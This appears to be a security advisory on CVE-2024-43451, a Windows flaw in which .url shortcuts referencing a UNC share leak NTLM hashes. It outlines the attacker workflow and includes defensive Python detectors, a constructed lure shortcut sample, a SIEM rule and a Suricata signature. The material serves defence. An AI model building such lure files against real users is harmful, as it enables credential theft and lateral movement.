CVE-2024-43451: Windows — NTLM Hash Disclosure Spoofing

CVE Details

CVE ID CVE-2024-43451
CVSS Score 6.5
Severity High
Vendor Microsoft
Product Windows
Patch Status Available
Published November 12, 2024
EPSS Score 90.3%
CISA Patch Deadline December 3, 2024 (federal deadline passed)

Background

NTLM hash theft has been a staple of Windows attacks for decades. There are various ways to trigger NTLM authentication to an attacker-controlled server — if the server captures the hash, it can be cracked offline or relayed to another server for authentication (Pass-the-Hash). CVE-2024-43451 is a new mechanism for achieving this without the user doing anything beyond interacting with a file in Windows Explorer.

This vulnerability was patched in November 2024 but was being exploited in the wild before the patch — specifically by a Russian threat actor targeting Ukrainian organisations, according to ClearSky Security research.

Technical Mechanism

Windows NTLM Hash Disclosure vulnerabilities work by forcing Windows to authenticate to an attacker-controlled server using NTLM, during which the NTLMv2 hash is transmitted. CVE-2024-43451 achieves this through a specific file type that, when interacted with in Windows Explorer (not necessarily opened or executed), triggers an NTLM authentication attempt.

The vulnerability involves .url files or similar shortcut/reference files that contain a reference to a UNC path (e.g., \\attacker-ip\share\). When a user:

  • Right-clicks the file
  • Views it in a preview pane
  • Or even just selects it in Explorer

Windows proactively attempts to authenticate to the referenced UNC path to resolve it, sending the user’s NTLMv2 hash in the process.

The attacker’s workflow:

  1. Deliver a malicious file (via phishing, compromised share, or download) to the target
  2. User interacts with the file in Explorer (minimal interaction — viewing is enough)
  3. Windows automatically attempts NTLM authentication to the attacker’s server
  4. Attacker’s Responder or similar tool captures the NTLMv2 hash
  5. Hash is cracked offline or relayed immediately to other services

Real-World Exploitation Evidence

ClearSky Security published analysis in November 2024 showing exploitation by a Russian threat actor (assessed as UNC5812, linked to APT29 or a related group) targeting Ukrainian government organisations:

  • Malicious .url files distributed via phishing campaigns
  • Files sent as part of spear-phishing emails themed around Ukrainian government topics
  • Captured NTLM hashes used for lateral movement within Ukrainian government networks
  • The exploitation was part of a broader campaign combining multiple Windows vulnerabilities

The ClearSky analysis specifically noted the minimal interaction required — mere file viewing triggered the hash leak.

Impact Assessment

  • NTLMv2 hash capture — captured hashes can be cracked offline using hashcat or John the Ripper; weak passwords crack in minutes
  • Pass-the-Hash attacks — even without cracking, the hash can be relayed to authenticate to other services (SMB shares, Exchange, web applications using Windows auth)
  • Credential reuse — users who reuse passwords across services are at elevated risk
  • Domain user compromise — even a regular user’s hash may grant access to shared drives or services with sensitive data
  • Lateral movement enabler — NTLM relay is a cornerstone technique for moving laterally in Windows environments
  • Stealthy — the user doesn’t need to “run” anything; viewing a file is enough

Affected Versions

Product                    | Affected Versions             | Fixed Version
Windows 10 (all versions)  | Before November 2024 patches  | KB5046613 and related
Windows 11 (all versions)  | Before November 2024 patches  | KB5046617 and related
Windows Server 2019        | Before November 2024 patches  | KB5046612
Windows Server 2022        | Before November 2024 patches  | KB5046616

Remediation Steps

  1. Apply November 2024 Patch Tuesday updates
  2. Independently of this specific CVE, consider disabling NTLM authentication where possible:
    • Group Policy: Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options
    • Set “Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers” to “Deny All”
  3. Block outbound SMB (TCP/445) and NetBIOS (TCP/139, UDP/137-138) to the internet at the perimeter
  4. Quarantine .url files in email gateways
  5. Enable Extended Protection for Authentication (EPA) on services that support it to mitigate NTLM relay
  6. Deploy LDAP signing and LDAP channel binding on domain controllers to prevent NTLM relay to AD
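A gateway-side check for remediation step 4, added here as an example and not code from Microsoft, ClearSky or this advisory: it parses an Internet Shortcut (.url) as INI text and flags any URL, IconFile or WorkingDirectory value that points at a UNC share, which is the reference type described in the Technical Mechanism section. The two sample shortcuts are constructed.

```python
r"""Gateway-side check for .url attachments that reference a UNC share.

Added example (not Microsoft's or ClearSky's code). An Internet Shortcut is
INI text; its URL, IconFile and WorkingDirectory keys can hold a path that
Explorer resolves, so a value shaped like \\host\share (or file://host/share)
is what this check quarantines on. The sample files below are constructed.
"""
import re
from configparser import ConfigParser, Error as IniError

# .url keys whose value Explorer may try to resolve without the user opening the file
PATH_KEYS = ("url", "iconfile", "workingdirectory")

# Leading \\host, //host, or file: followed by two separators (literal or %5c-encoded)
UNC_RE = re.compile(r"^\s*(\\\\|//|file:(?:%5c|\\|/){2})", re.IGNORECASE)

def find_unc_references(text: str) -> list[tuple[str, str]]:
    """Return (key, value) pairs whose value points at a remote share."""
    text = text.lstrip("\ufeff")  # a BOM would otherwise break the first section header
    parser = ConfigParser(interpolation=None, strict=False)  # keys are lower-cased by default
    try:
        parser.read_string(text)
    except IniError:
        # Malformed INI (e.g. no [InternetShortcut] header): fall back to a line scan
        # rather than letting an oddly formed file slip past the check.
        return [("raw", line.strip()) for line in text.splitlines()
                if "=" in line and UNC_RE.match(line.split("=", 1)[1])]
    return [(key, value.strip())
            for section in parser.sections()
            for key, value in parser.items(section)
            if key in PATH_KEYS and UNC_RE.match(value)]

def should_quarantine(text: str) -> bool:
    return bool(find_unc_references(text))

# Constructed samples: a benign shortcut and one whose icon lives on a remote share.
BENIGN_URL = r"""[InternetShortcut]
URL=https://intranet.example.invalid/report
IconFile=C:\Windows\System32\SHELL32.dll
"""
LURE_URL = r"""[InternetShortcut]
URL=https://intranet.example.invalid/report
IconFile=\\192.0.2.10\share\icon.ico
"""

if __name__ == "__main__":
    for name, body in (("benign", BENIGN_URL), ("lure", LURE_URL)):
        verdict = "quarantine" if should_quarantine(body) else "deliver"
        print(name, verdict, find_unc_references(body))
```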

Detection Guidance

Network monitoring — watch for NTLM authentication attempts from internal hosts to external IPs on port 445. This should essentially never happen on a properly configured network.
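The network check described above, as an added example that is not the advisory's own tooling: it reads Zeek-style conn.log records and flags internal sources opening SMB or NetBIOS ports to hosts outside the organisation's own address ranges. The column order and the internal ranges are assumptions, and the log lines are constructed.

```python
"""Flag outbound SMB/NetBIOS from internal hosts to the internet.

Added example (not the advisory's tooling). A CVE-2024-43451-style lure makes
the victim's workstation open TCP/445 to a host outside the network, so the
check is: internal source, external destination, SMB/NetBIOS port. The
records below are constructed in a Zeek conn.log-like layout
(ts, uid, orig_h, orig_p, resp_h, resp_p, proto); column order is an assumption.
"""
import ipaddress

# Assumed address plan; use the organisation's own ranges rather than
# ipaddress.is_private, which also treats documentation ranges such as 203.0.113.0/24 as private.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Ports the remediation section says should be blocked outbound at the perimeter
SMB_PORTS = {("tcp", 445), ("tcp", 139), ("udp", 137), ("udp", 138)}

def is_internal(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)

def outbound_smb_to_internet(records):
    """Return alerts for records where an internal host talks SMB/NetBIOS to an external one."""
    alerts = []
    for line in records:
        if not line or line.startswith("#"):  # skip Zeek header/comment lines
            continue
        ts, uid, src, _sport, dst, dport, proto = line.split("\t")[:7]
        if (proto.lower(), int(dport)) not in SMB_PORTS:
            continue
        if is_internal(src) and not is_internal(dst):
            alerts.append({"ts": ts, "uid": uid, "src": src, "dst": dst,
                           "dport": int(dport), "proto": proto.lower()})
    return alerts

# Constructed sample: internal SMB (fine), outbound SMB (alert), HTTPS (fine), outbound NetBIOS (alert)
SAMPLE_CONN_LOG = [
    "#fields\tts\tuid\tid.orig_h\tid.orig_p\tid.resp_h\tid.resp_p\tproto",
    "1731400000.1\tC1\t10.20.30.40\t49812\t10.20.1.5\t445\ttcp",
    "1731400003.7\tC2\t10.20.30.40\t49815\t203.0.113.7\t445\ttcp",
    "1731400004.2\tC3\t10.20.30.41\t51000\t203.0.113.9\t443\ttcp",
    "1731400005.9\tC4\t10.20.30.42\t137\t203.0.113.7\t137\tudp",
]

if __name__ == "__main__":
    for a in outbound_smb_to_internet(SAMPLE_CONN_LOG):
        print(f"ALERT {a['ts']} {a['uid']}: {a['src']} -> {a['dst']}:{a['dport']}/{a['proto']}")
```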

Windows Event Logs:

  • Event ID 4776: NTLM authentication — correlate with unexpected target servers
  • Winlogon/NTLM diagnostic logs (enable with netsh trace start capture=yes)

SIEM rule:

event_id = 4776 AND
source_workstation = (internal_host) AND
target_server NOT IN (known_internal_servers)

Suricata signature:

alert smb any any -> !$HOME_NET any (msg:"Outbound NTLM Auth Possible CVE-2024-43451 Hash Steal"; flow:established,to_server; content:"|ff|SMB"; offset:4; depth:4; classtype:credential-theft; sid:2034019; rev:1;)

Timeline

Date                   | Event
2024 (pre-patch)       | Russian APT exploits CVE-2024-43451 targeting Ukrainian government
October/November 2024  | ClearSky observes campaigns
12 November 2024       | Microsoft patches CVE-2024-43451 in November Patch Tuesday
November 2024          | CISA adds to Known Exploited Vulnerabilities catalogue
November 2024          | ClearSky publishes analysis of exploitation